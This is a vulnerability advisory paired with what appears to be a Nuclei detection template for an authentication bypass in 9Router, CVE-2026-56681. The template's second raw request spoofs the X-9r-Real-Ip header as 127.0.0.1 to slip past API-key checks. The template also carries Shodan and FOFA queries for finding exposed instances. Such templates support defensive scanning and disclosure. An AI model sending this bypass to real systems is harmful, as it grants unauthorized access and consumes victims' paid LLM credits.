9Router prior to 0.5.6 contains an authentication bypass caused by trusting client-supplied X-9r-Real-Ip header in src/dashboardGuard.js, letting remote unauthenticated attackers access local API routes and consume resources, exploit requires bypassing API-key validation via header manipulation.
PoC
id: CVE-2026-56681
info:
name: 9router <=0.5.4 - Authentication Bypass
author: 0x_Akoko
severity: high
description: |
9Router prior to 0.5.6 contains an authentication bypass caused by trusting client-supplied X-9r-Real-Ip header in src/dashboardGuard.js, letting remote unauthenticated attackers access local API routes and consume resources, exploit requires bypassing API-key validation via header manipulation.
impact: |
Remote attackers can bypass API-key validation to use LLM providers, consume paid credits, and enumerate models without authorization.
remediation: |
Update to version 0.5.6 or later.
reference:
- https://github.com/advisories/GHSA-5mj8-gf6m-fhw8
- https://github.com/decolua/9router/security/advisories/GHSA-5mj8-gf6m-fhw8
- https://github.com/decolua/9router/commit/efd20be8d81ef2e256a7037f3aa78e6b567b5fd3
- https://github.com/decolua/9router/releases/tag/v0.5.6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2026-56681
epss-score: 0.00968
epss-percentile: 0.60324
cwe-id: CWE-807
metadata:
verified: true
max-request: 2
shodan-query: http.html:"9Router"
fofa-query: body="9Router"
tags: cve,cve2026,9router,auth-bypass,llm,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /api/v1/models HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 401'
- 'contains(body, "API key required for remote API access")'
condition: and
- raw:
- |
GET /api/v1/models HTTP/1.1
Host: {{Hostname}}
X-9r-Real-Ip: 127.0.0.1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "json")'
- 'contains_all(body, "owned_by", "object", "data")'
condition: and
# digest: 4a0a0047304502206e2bdbf73f977d8c31fc7f0069072be1f27b70e3e572995ead11d7792dd5ffc1022100fd951cbdfe252b0430752a148b9995aefbad5ba35e7d35f965c717416f335a3f:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.